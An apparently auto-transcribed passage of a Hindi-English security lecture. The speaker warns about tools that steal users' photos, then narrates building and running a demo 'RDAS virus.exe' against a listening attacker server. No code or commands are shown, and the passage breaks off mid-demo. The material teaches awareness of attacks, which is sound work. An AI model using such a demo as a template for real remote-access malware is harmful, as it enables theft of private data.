सॉफ्टवेयर नोन एज फेसबुक हैकर, स्पेशली फॉर गर्ल्स, बिकॉज व्हाट द अटैकर्स डू, they steal the snaps of yours from the system and then they misuse it. A lot of things are there, ठीक है ना। जनरली आप लोग फेसबुक यूज करते हो, अवेयर हो गए। सो इट इज द रिस्पॉन्सिबिलिटी ऑफ द प्रोग्रामर्स टू बी प्रोटेक्टेड एंड टू प्रोटेक्ट एनी ऑफ द सॉफ्टवेयर विच दे आर मेकिंग, बिकॉज अटैकर्स आर क्वाइट गुड इन एक्सप्लॉइटिंग योर सॉफ्टवेयर, ठीक है ना। एक छोटा सा कैलकुलेटर भी बड़ा हैवॉक क्रिएट कर सकता है। तो ये था, ठीक है ना, बनाते हैं इसको, रिलीज करते हैं, ठीक है। देखो क्या किया, बिल्ड किया, बिल्ड द सोल्यूशन अगेन, बन गई मेरी RDAS virus.exe फिर से, ठीक है ना। देखो क्या करना है, अब नीचे चलते हैं, नीचे नहीं मतलब यहां चलते हैं, नीचे तो है ही हम ऑलरेडी, कॉपी किया, RDAS में ले गया, यहां पे इसका कर देता हूं पुराना वाला, ठीक है ना। और ये कौन सा है? नया वाला, आने वाला, ये भी सही है, अपने आप ही हो गया, देखो ठीक है। देखो तो क्या है मेरे पास, आने वाला है, ठीक है, चलाऊं आने वाला, ठीक है, RDAS वायरस आने वाला है, बिल्कुल सही बात कही इन्होंने, इतने खुश होके कही है कि मैं भी रोक नहीं पाया अपने आप को बताने से। फिर देखो, अरे यार छोटा हो जाना,
देखो ठीक बात है। तो ये क्या है, लिसन कर रहे हैं यहाँ पे सर्वर, ये अटैकर वाला फाइल है,